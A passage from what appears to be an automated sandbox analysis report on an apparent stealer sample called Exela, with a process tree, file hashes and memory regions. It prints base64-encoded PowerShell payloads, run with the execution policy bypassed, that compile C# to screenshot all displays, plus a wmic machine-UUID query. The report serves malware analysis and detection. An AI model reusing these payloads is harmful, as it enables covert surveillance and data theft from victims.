lACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                            2⤵
                                                                                                                              PID:1140
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                3⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:1892
                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mo0ndvv4\mo0ndvv4.cmdline"
                                                                                                                                  4⤵
                                                                                                                                    PID:4640
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78A6.tmp" "c:\Users\Admin\AppData\Local\Temp\mo0ndvv4\CSC822CCC1635946C9AE81394DD91FE38.TMP"
                                                                                                                                      5⤵
                                                                                                                                        PID:3748
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                  2⤵
                                                                                                                                    PID:3988
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic csproduct get uuid
                                                                                                                                      3⤵
                                                                                                                                        PID:2336
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:3028
                                                                                                                                    • C:\Windows\system32\UserAccountControlSettings.exe
                                                                                                                                      "C:\Windows\system32\UserAccountControlSettings.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:2008
                                                                                                                                    • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                      C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                                                                                                                                      1⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4684

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe

                                                                                                                                      Filesize

                                                                                                                                      24.3MB

                                                                                                                                      MD5

                                                                                                                                      28ff0cac1b7a4225c599b7366f5afb42

                                                                                                                                      SHA1

                                                                                                                                      89562ab281aecd486f4d07e5cd6f1cb823459521

                                                                                                                                      SHA256

                                                                                                                                      f6affa968b207a553f4825db54f148a2697c7a786eac16f83df8997a5ea85044

                                                                                                                                      SHA512

                                                                                                                                      a88a332f72e38386eaf9c689df65f4762a1f9c67cab9a63f94beb199d9c04543ff16f522b2ebe180600b78f2fb3d0f49808349ab5dcaa3d5ef5153651c12c95d

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                      Filesize

                                                                                                                                      3KB

                                                                                                                                      MD5

                                                                                                                                      8740e7db6a0d290c198447b1f16d5281

                                                                                                                                      SHA1

                                                                                                                                      ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                                                                                                      SHA256

                                                                                                                                      f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                                                                                                      SHA512

                                                                                                                                      d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                      Filesize

                                                                                                                                      152B

                                                                                                                                      MD5

                                                                                                                                      23b6e2531d39ba76e0604a4685249f2d

                                                                                                                                      SHA1

                                                                                                                                      5f396f68bd58b4141a3a0927d0a93d5ef2c8172f

                                                                                                                                      SHA256

                                                                                                                                      4a486d7be440ddf2909be2c2b41e55f0666b02670bbf077ac435e3cddc55a15e

                                                                                                                                      SHA512

                                                                                                                                      a1a7fef086526e65184f60b61d483848183ef7c98cf09f05ac9e5b11504696406120ab01da8ed7f35e3145aa5fc54307c9397770681e4d10feea64113e7a57cd

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                      Filesize

                                                                                                                                      152B

                                                                                                                                      MD5

                                                                                                                                      6ffd468ded3255ce35ba13e5d87c985a

                                                                                                                                      SHA1

                                                                                                                                      09f11746553fd82f0a0ddef4994dc3605f39ccec

                                                                                                                                      SHA256

                                                                                                                                      33103b1e4da1933459575d2e0441b8693ba1ede4695a3d924e2d74e72becabd8

                                                                                                                                      SHA512

                                                                                                                                      5d5530c57faa4711f51e4baef0d1f556937a5db1e2a54ee376c3556c01db0ddf628856f346057d3849baa5db35603b96a0a9894f3c65a80c947085eb640348ee

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                      Filesize

                                                                                                                                      124KB

                                                                                                                                      MD5

                                                                                                                                      dffa16d45b2cc33eb93a10f821c59962

                                                                                                                                      SHA1

                                                                                                                                      3155e1a94c8d4a883cca4559ce7a7c8b84683d47

                                                                                                                                      SHA256

                                                                                                                                      f088572d1d351f63e55316bb1270b8d5f0288eb48bac21d94ed1e51253aaaf73

                                                                                                                                      SHA512

                                                                                                                                      d1ebd7e1884c7bc144d09a32070aa33631487534626524e8619168ec8439fe240dd01accc920386fbc5176689ce83e5d9eadbc75abcaa45f0de4257f83a1d325

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                      Filesize

                                                                                                                                      6KB

                                                                                                                                      MD5

                                                                                                                                      1df51efbac6a3df9b01ce96eb906adbe

                                                                                                                                      SHA1

                                                                                                                                      517f3b2bac36d6c853c081b480e48a17d5dfdb24

                                                                                                                                      SHA256

                                                                                                                                      4ff5789b17057c0156aac3eb502a52cf62f45e2a800166f7b1dbba51812aa32f

                                                                                                                                      SHA512

                                                                                                                                      5efc097bf938f788ef839a4eeb9dca2013bfe5c0549738be43af4bbf6a93bdeee1172358d5d607c22751f9cb81448296d95fcf248600f797757c7022538031d0

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                      Filesize

                                                                                                                                      6KB

                                                                                                                                      MD5

                                                                                                                                      a80ab4398efe5079c44141ef9cdab4af

                                                                                                                                      SHA1

                                                                                                                                      98fed52f322cbba347193064fece65d80beb4a3d

                                                                                                                                      SHA256

                                                                                                                                      76c3ee06957a30ad39ad18a07a6431fb7077db850ed828d08972b218e0073c98

                                                                                                                                      SHA512

                                                                                                                                      6a724148841495bbdd33767462d847c4f20708046469e00e3e543a056a53fab721a24410008684e3a264372057d120fedef5c11ceb0254c4be22f7c08bca6754

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                      Filesize

                                                                                                                                      16B

                                                                                                                                      MD5

                                                                                                                                      206702161f94c5cd39fadd03f4014d98

                                                                                                                                      SHA1

                                                                                                                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                      SHA256

                                                                                                                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                      SHA512

                                                                                                                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                      Filesize

                                                                                                                                      16B

                                                                                                                                      MD5

                                                                                                                                      46295cac801e5d4857d09837238a6394

                                                                                                                                      SHA1

                                                                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                      SHA256

                                                                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                      SHA512

                                                                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                      Filesize

                                                                                                                                      10KB

                                                                                                                                      MD5

                                                                                                                                      ba4be0cee4efc90787eb112e73fd0268

                                                                                                                                      SHA1

                                                                                                                                      239a359001a2692212d81426c8e31477f535f355

                                                                                                                                      SHA256

                                                                                                                                      bdb1d6c839509e942efc517abf25622d5065b2a67495be46869a92c71d278163

                                                                                                                                      SHA512

                                                                                                                                      5930b073295f5c8478fb57e1f481024e4702e27efe6f32402860709c3b6ab159fd592e83b7678ab999cdb62e0a8bf33fad566966628fb9c2bcf82c6be6025ca3

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                      Filesize

                                                                                                                                      10KB

                                                                                                                                      MD5

                                                                                                                                      3047a62d1572b572e4810f6b744f0a08

                                                                                                                                      SHA1

                                                                                                                                      8b54f335043e060fb1a1feceeb2d0f82828acd96

                                                                                                                                      SHA256

                                                                                                                                      39b38a0dbd2b5dcdaf22d63e0b3fa74bf5b36a11d38c354476f6906f0cb8d210

                                                                                                                                      SHA512

                                                                                                                                      63fb9d4dab564b5fba3c0258b9cd2b2f23f5c29e5f5a1c44228b983608024a63cdec10909489df6ef800c69a8c017f7639c2703285c71c2f51374263e9a98fbf

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      64B

                                                                                                                                      MD5

                                                                                                                                      d8b9a260789a22d72263ef3bb119108c

                                                                                                                                      SHA1

                                                                                                                                      376a9bd48726f422679f2cd65003442c0b6f6dd5

                                                                                                                                      SHA256

                                                                                                                                      d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

                                                                                                                                      SHA512

                                                                                                                                      550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Display (1).png

                                                                                                                                      Filesize

                                                                                                                                      264KB

                                                                                                                                      MD5

                                                                                                                                      a60dc92ed703b22e808a5e352220a5d6

                                                                                                                                      SHA1

                                                                                                                                      36509c1c0583bb05b4666ef47faff213b60e5ecc

                                                                                                                                      SHA256

                                                                                                                                      05c9acd9c065dc4ed4d4de4433e0e64e057ebf1a176f98c3be06746a2840e1cc

                                                                                                                                      SHA512

                                                                                                                                      e9a3b0ebfce87a1d188edb99dd3c8df1de3f8f9f57bb9893e4b3b7f99ca46464e8058f9fa01a7b33e7cd81b0b9251d187c25c9e1f8192cb0d79a2bdbc11c7925

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RES78A6.tmp

                                                                                                                                      Filesize

                                                                                                                                      1KB

                                                                                                                                      MD5

                                                                                                                                      d48e6be2981d2eda36a4d9a754fb9def

                                                                                                                                      SHA1

                                                                                                                                      792b106f6a06b3d28d1579a302f4ed659a024ccd

                                                                                                                                      SHA256

                                                                                                                                      ce31457b4b5c43037def5416ca331b3a695fcbe77149af234eeb6d16f094e3db

                                                                                                                                      SHA512

                                                                                                                                      7729f0be066224ce875b1a755909a96bdd9a36380cf6c9c941e07773b922a49d0a7e1873ebc4e0b5e732279bf582c2d4afad5a7fc1dfe2e6c9b0b8eebdd61259

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uzq53eb1.ybv.ps1

                                                                                                                                      Filesize

                                                                                                                                      60B

                                                                                                                                      MD5

                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                      SHA1

                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                      SHA256

                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                      SHA512

                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\mo0ndvv4\mo0ndvv4.dll

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                      MD5

                                                                                                                                      05697ec08613193f5702333eea9d1f77

                                                                                                                                      SHA1

                                                                                                                                      03ac9fb54612a47f1156ca0250fcc5b57a63e9e1

                                                                                                                                      SHA256

                                                                                                                                      7f2b682218a03cd191a6982de821c278148b75bdccbf00999d05ba8e9344308c

                                                                                                                                      SHA512

                                                                                                                                      afc54de9b1cbb748a15b2168f91507c7bdd8ca5cf77ffc6b7629a5f665a25bdabcca51500c9e4e3cc4f7460f639e5117838623b0b20439b2a7425dce15b35703

                                                                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\mo0ndvv4\CSC822CCC1635946C9AE81394DD91FE38.TMP

                                                                                                                                      Filesize

                                                                                                                                      652B

                                                                                                                                      MD5

                                                                                                                                      cde65a756630436f36ada6b7dc5129e1

                                                                                                                                      SHA1

                                                                                                                                      e8a996c9f7a22d6232ab0a6e8d1d00bc496cb7d5

                                                                                                                                      SHA256

                                                                                                                                      bef5686d25f0d06bbcb4d2120b65e87a1a9695f9a4248daeeb639e04d88e6926

                                                                                                                                      SHA512

                                                                                                                                      01ed80407ed80fc12f8d557ba7acf701d5fd4bc4311469c79532a9842abc3af6f1acd7babeda4b37f49cef1388628efd211c6fd3bc42c05712d521096dc925ea

                                                                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\mo0ndvv4\mo0ndvv4.0.cs

                                                                                                                                      Filesize

                                                                                                                                      1004B

                                                                                                                                      MD5

                                                                                                                                      c76055a0388b713a1eabe16130684dc3

                                                                                                                                      SHA1

                                                                                                                                      ee11e84cf41d8a43340f7102e17660072906c402

                                                                                                                                      SHA256

                                                                                                                                      8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                                                                      SHA512

                                                                                                                                      22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\mo0ndvv4\mo0ndvv4.cmdline

                                                                                                                                      Filesize

                                                                                                                                      607B

                                                                                                                                      MD5

                                                                                                                                      a864b446a1993127b1aa119349f53cec

                                                                                                                                      SHA1

                                                                                                                                      40441714168633b0609bb60b7d6d5f04344dbe94

                                                                                                                                      SHA256

                                                                                                                                      8aa376b0bca8a5c57878952e17ad4fe6e5d3cc7746fc9945c7db26817b6610d6

                                                                                                                                      SHA512

                                                                                                                                      dacb68b49b93ffe4cd2313b93a8a77e86b99555112e97ea5f7c8a9d8c8d6020b501701114e4e492bd40cc29525dc9f4db46f921ba7b0bf505b2d870c625d14bc

                                                                                                                                    • memory/1660-164-0x0000016BEDE40000-0x0000016BEDE62000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/1892-203-0x0000014B72AD0000-0x0000014B72AD8000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB